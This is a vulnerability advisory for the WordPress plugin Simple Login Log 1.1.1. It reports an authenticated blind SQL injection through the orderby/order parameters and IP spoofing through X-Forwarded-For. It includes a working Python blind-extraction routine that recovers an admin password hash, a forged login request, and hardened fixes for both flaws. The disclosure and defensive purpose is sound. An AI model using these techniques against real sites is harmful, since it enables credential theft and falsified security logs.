Wordpress: Multiple Vulnerabilities in Simple Login Log Plugin
We discovered two vulnerabilities in the WordPress plugin Simple Login Log.
Vulnerability: Authenticated Blind SQL Injection, Source IP Address Manipulation
Affected Version: 1.1.1 (earlier versions may be affected as well)
Patched Version: Not available yet (vendor contacted, no response so far)
Blind SQL Injection
===================
Affected URL: http://localhost/wp-admin/users.php?page=login_log&orderby=ip&order=asc
Affected Parameters: orderby and order
[Screenshot]
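The advisory does not reproduce the plugin's query, so the following is an added example (not the plugin's code) of the class of bug reported above: it assumes the common pattern of concatenating the orderby and order parameters straight into an ORDER BY clause, and shows how a single sort-order oracle lets an authenticated user read arbitrary data one character at a time, next to a whitelist-based fix. The table contents, column names and the users row are constructed; the example uses SQLite in place of MySQL, and the WordPress users table is stood in by a tiny local table.

```python
import sqlite3

# Constructed sample data standing in for the plugin's login-log table and
# the WordPress users table; not the plugin's real schema.
LOGIN_ROWS = [
    (1, "admin",  "administrator", "2016-05-01 10:00:00", "10.0.0.5",     1),
    (2, "editor", "editor",        "2016-05-01 10:05:00", "192.168.1.20", 1),
    (3, "admin",  "administrator", "2016-05-01 10:07:00", "203.0.113.9",  0),
]
SECRET_HASH = "$P$Bexamplehash"   # constructed placeholder, not a real hash


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login_log (id INTEGER, user_login TEXT, "
                 "user_role TEXT, time TEXT, ip TEXT, login_result INTEGER)")
    conn.executemany("INSERT INTO login_log VALUES (?, ?, ?, ?, ?, ?)", LOGIN_ROWS)
    conn.execute("CREATE TABLE users (ID INTEGER, user_login TEXT, user_pass TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET_HASH,))
    return conn


def vulnerable_query(conn, orderby, order):
    """Assumed vulnerable pattern: orderby/order concatenated into ORDER BY."""
    sql = f"SELECT id FROM login_log ORDER BY {orderby} {order}"
    return [row[0] for row in conn.execute(sql)]


ALLOWED_COLUMNS = {"id", "user_login", "user_role", "time", "ip", "login_result"}
ALLOWED_ORDER = {"asc", "desc"}


def safe_query(conn, orderby, order):
    """Hardened: identifiers cannot be bound as parameters, so whitelist them
    and fall back to a fixed default for anything else."""
    column = orderby if orderby in ALLOWED_COLUMNS else "time"
    direction = order.lower() if order.lower() in ALLOWED_ORDER else "desc"
    sql = f"SELECT id FROM login_log ORDER BY {column} {direction}"
    return [row[0] for row in conn.execute(sql)]


def oracle(conn, condition):
    """Boolean-blind oracle: rows come back ascending when the condition is
    true and descending when it is false, so the page's sort order leaks 1 bit."""
    payload = f"(CASE WHEN ({condition}) THEN id ELSE -id END)"
    return vulnerable_query(conn, payload, "asc") == [1, 2, 3]


def extract_string(conn, subquery, max_len=64):
    """Recover a scalar subquery result one printable character at a time,
    binary-searching the code point so each character costs about 7 requests."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"length(({subquery})) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    conn = make_db()
    print(extract_string(conn, "SELECT user_pass FROM users WHERE user_login = 'admin'"))
    print(safe_query(conn, "(CASE WHEN (1=1) THEN id ELSE -id END)", "asc"))
```

In WordPress terms the fix is the same whitelist idea: $wpdb->prepare() cannot quote an identifier or a sort direction, so check orderby and order against in_array() lists before building the query. Note that safe_query returns the same rows for a true and a false payload, which is exactly what removes the oracle.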
Source IP Address Manipulation
==============================
This plugin records the IP address of a user who has successfully logged in, taking it from the X-Forwarded-For HTTP header whenever that header is present and falling back to REMOTE_ADDR otherwise:
$values = array(
    'uid'          => $uid,
    'user_login'   => $user_login,
    'user_role'    => $user_role,
    'time'         => current_time('mysql'),
    'ip'           => isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? esc_attr($_SERVER['HTTP_X_FORWARDED_FOR']) : esc_attr($_SERVER['REMOTE_ADDR']), // header is client-controlled
    'login_result' => $this->login_success,
    'data'         => $serialized_data,
);
$format = array('%d', '%s', '%s', '%s', '%s', '%s', '%s');
$this->save_data($values, $format);
As the 'ip' entry above shows, the header is trusted unconditionally: whenever X-Forwarded-For is present its value is stored instead of REMOTE_ADDR, and esc_attr() only HTML-escapes it rather than checking that it is an IP address. Any client can therefore set the header itself and choose what the log records as its source address, which defeats the purpose of the log.
Example:
POST /wp/wp-login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp/wp-login.php
X-Forwarded-For: blablabla
Cookie: wordpress_test_cookie=WP+Cookie+check; PHPSESSID=45abjfebtenkrqikf108dlhca6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp%2Fwp-admin%2F&testcookie=1
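As an added example (not the plugin's code), the following Python reproduces the plugin's address-selection logic next to a hardened version that only honours X-Forwarded-For when the request actually arrived from a trusted reverse proxy, and then picks the right-most hop that is not itself a proxy. The trusted proxy range 10.0.0.0/8 and the $_SERVER-shaped request dictionaries are constructed assumptions; the advisory's test setup is a bare localhost install with no proxy at all.

```python
import ipaddress

# Assumed trusted reverse-proxy range (constructed for this example).
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def plugin_client_ip(server):
    """Mirrors the plugin's 'ip' expression: X-Forwarded-For wins whenever it is
    present. esc_attr() is omitted because it only HTML-escapes the value; it
    does not check that the value is an address."""
    return server.get("HTTP_X_FORWARDED_FOR", server["REMOTE_ADDR"])


def _is_trusted(addr, trusted):
    return any(addr in net for net in trusted)


def hardened_client_ip(server, trusted=TRUSTED_PROXIES):
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy, then
    take the right-most hop that is not a trusted proxy: proxies append to the
    header, so a client can only prepend junk in front of the real hop.
    Anything unparsable falls back to the socket address."""
    remote = ipaddress.ip_address(server["REMOTE_ADDR"])
    if not _is_trusted(remote, trusted):
        return str(remote)          # direct connection: the header is attacker-supplied
    raw = server.get("HTTP_X_FORWARDED_FOR", "")
    hops = [h.strip() for h in raw.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return str(remote)      # garbage such as "blablabla": do not record it
        if not _is_trusted(addr, trusted):
            return str(addr)
    return str(remote)              # every hop was a proxy; nothing better to report


# Constructed request environments in the shape of PHP's $_SERVER.
DIRECT_SPOOF = {"REMOTE_ADDR": "203.0.113.9", "HTTP_X_FORWARDED_FOR": "blablabla"}
VIA_PROXY = {"REMOTE_ADDR": "10.0.0.5", "HTTP_X_FORWARDED_FOR": "192.0.2.1, 198.51.100.7"}

if __name__ == "__main__":
    for env in (DIRECT_SPOOF, VIA_PROXY):
        print(plugin_client_ip(env), "->", hardened_client_ip(env))
```

For the request shown above, the plugin logic stores the literal string "blablabla", while the hardened version stores 203.0.113.9 because no trusted proxy is involved. Behind a real proxy the attacker can still prepend a fake hop, which is why the hardened version walks the list from the right instead of taking the first entry.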